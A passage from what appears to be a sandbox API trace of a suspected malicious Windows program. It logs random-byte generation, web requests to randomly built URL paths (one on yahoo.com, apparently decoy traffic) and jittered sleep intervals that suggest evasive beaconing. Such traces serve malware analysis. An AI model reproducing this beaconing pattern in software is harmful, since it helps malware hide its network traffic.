lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.922] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.922] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.922] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0207.923] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.923] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.923] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.923] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.923] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.923] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.923] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.923] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0207.924] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.924] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.924] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.924] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.924] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.924] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.924] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0207.925] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0207.925] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.925] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.926] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.926] GetProcessHeap () returned 0x440000 [0207.926] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4724e0 [0207.926] lstrcpyA (in: lpString1=0x4724e0, lpString2="°¨¡\x03" | out: lpString1="°¨¡\x03") returned="°¨¡\x03" [0207.926] lstrcatA (in: lpString1="°¨¡\x03", lpString2="/fjqOhuymwhhac1cKp8yh5Nv3gd3w4flesjqgfz/em4pth3hfo0wgbikw4vvsbhsiYvlfo4fxlBktbk68bl/" | out: lpString1="°¨¡\x03/fjqOhuymwhhac1cKp8yh5Nv3gd3w4flesjqgfz/em4pth3hfo0wgbikw4vvsbhsiYvlfo4fxlBktbk68bl/") returned="°¨¡\x03/fjqOhuymwhhac1cKp8yh5Nv3gd3w4flesjqgfz/em4pth3hfo0wgbikw4vvsbhsiYvlfo4fxlBktbk68bl/" [0207.926] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0207.926] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="°¨¡\x03/fjqOhuymwhhac1cKp8yh5Nv3gd3w4flesjqgfz/em4pth3hfo0wgbikw4vvsbhsiYvlfo4fxlBktbk68bl/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0207.926] GetProcessHeap () returned 0x440000 [0207.926] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4724e0 | out: hHeap=0x440000) returned 1 [0207.926] GetProcessHeap () returned 0x440000 [0207.926] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1a8b0 | out: hHeap=0x440000) returned 1 [0207.927] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0207.927] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0207.927] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.927] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0207.928] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0207.928] Sleep (dwMilliseconds=0x1697e) [0208.252] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.253] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0208.253] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.253] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0208.253] GetProcessHeap () returned 0x440000 [0208.254] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f58f0 [0208.254] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.254] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0208.254] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.255] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f58f1, cbBuffer=0x2c, dwFlags=0x2 | out: pbBuffer=0x4f58f1) returned 0x0 [0208.255] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.255] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0208.255] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.256] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0208.256] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.256] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0208.256] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.256] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0208.257] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.257] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0208.257] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.257] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0208.257] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.257] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0208.258] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.258] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0208.258] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.260] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0208.261] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.261] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0208.261] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.261] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0208.261] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.261] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0208.261] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.261] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0208.262] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.262] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0208.262] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.262] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0208.262] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.263] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0208.263] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.263] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0208.263] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.263] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0208.263] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.263] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0208.264] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.264] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0208.264] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.264] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0208.264] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.264] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0208.350] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.350] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0208.351] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0208.351] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0208.351] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0208.352] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0208.352] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0208.352] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0208.353] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0208.353] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0208.354] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0208.354] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.685] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0208.686] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.686] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0208.686] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.686] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0208.686] GetProcessHeap () returned 0x440000 [0208.686] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473350 [0208.686] lstrcpyA (in: lpString1=0x473350, lpString2="ðXO" | out: lpString1="ðXO") returned="ðXO" [0208.686] lstrcatA (in: lpString1="ðXO", lpString2="/1uuy9cJlZtccvp8as2vO814x8H74fd85bjjraCyk8ko/" | out: lpString1="ðXO/1uuy9cJlZtccvp8as2vO814x8H74fd85bjjraCyk8ko/") returned="ðXO/1uuy9cJlZtccvp8as2vO814x8H74fd85bjjraCyk8ko/" [0208.687] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0208.687] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="ðXO/1uuy9cJlZtccvp8as2vO814x8H74fd85bjjraCyk8ko/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0208.687] GetProcessHeap () returned 0x440000 [0208.687] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473350 | out: hHeap=0x440000) returned 1 [0208.687] GetProcessHeap () returned 0x440000 [0208.687] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f58f0 | out: hHeap=0x440000) returned 1 [0208.687] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0208.688] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0208.688] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0208.688] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0208.688] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0208.688] Sleep (dwMilliseconds=0x172f8) [0209.065] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.065] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0209.066] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.066] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0209.066] GetProcessHeap () returned 0x440000 [0209.066] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f51f0 [0209.066] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.066] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0209.067] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.067] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f51f1, cbBuffer=0x11, dwFlags=0x2 | out: pbBuffer=0x4f51f1) returned 0x0 [0209.067] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.067] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.067] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.067] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.068] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.068] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0209.068] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.069] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.069] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.069] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.069] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0209.069] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.069] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0209.070] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.070] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0209.070] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.070] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0209.070] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.070] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.070] GetProcessHeap () returned 0x440000 [0209.071] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0209.071] lstrcpyA (in: lpString1=0x472f30, lpString2=")Hµ²s://www.yahoo.com" | out: lpString1=")Hµ²s://www.yahoo.com") returned=")Hµ²s://www.yahoo.com" [0209.071] lstrcatA (in: lpString1=")Hµ²s://www.yahoo.com", lpString2="/rwn6Dst9d53sTMZc/" | out: lpString1=")Hµ²s://www.yahoo.com/rwn6Dst9d53sTMZc/") returned=")Hµ²s://www.yahoo.com/rwn6Dst9d53sTMZc/" [0209.071] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0209.071] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl=")Hµ²s://www.yahoo.com/rwn6Dst9d53sTMZc/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0209.071] GetProcessHeap () returned 0x440000 [0209.071] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0209.071] GetProcessHeap () returned 0x440000 [0209.071] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f51f0 | out: hHeap=0x440000) returned 1 [0209.072] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0209.072] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0209.072] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.073] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0209.073] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0209.073] Sleep (dwMilliseconds=0xfbef) [0209.504] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.504] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0209.504] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.504] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0209.504] GetProcessHeap () returned 0x440000 [0209.504] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0209.504] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.504] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0209.505] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.505] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x13, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0209.505] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.505] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.506] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0209.506] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0209.506] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 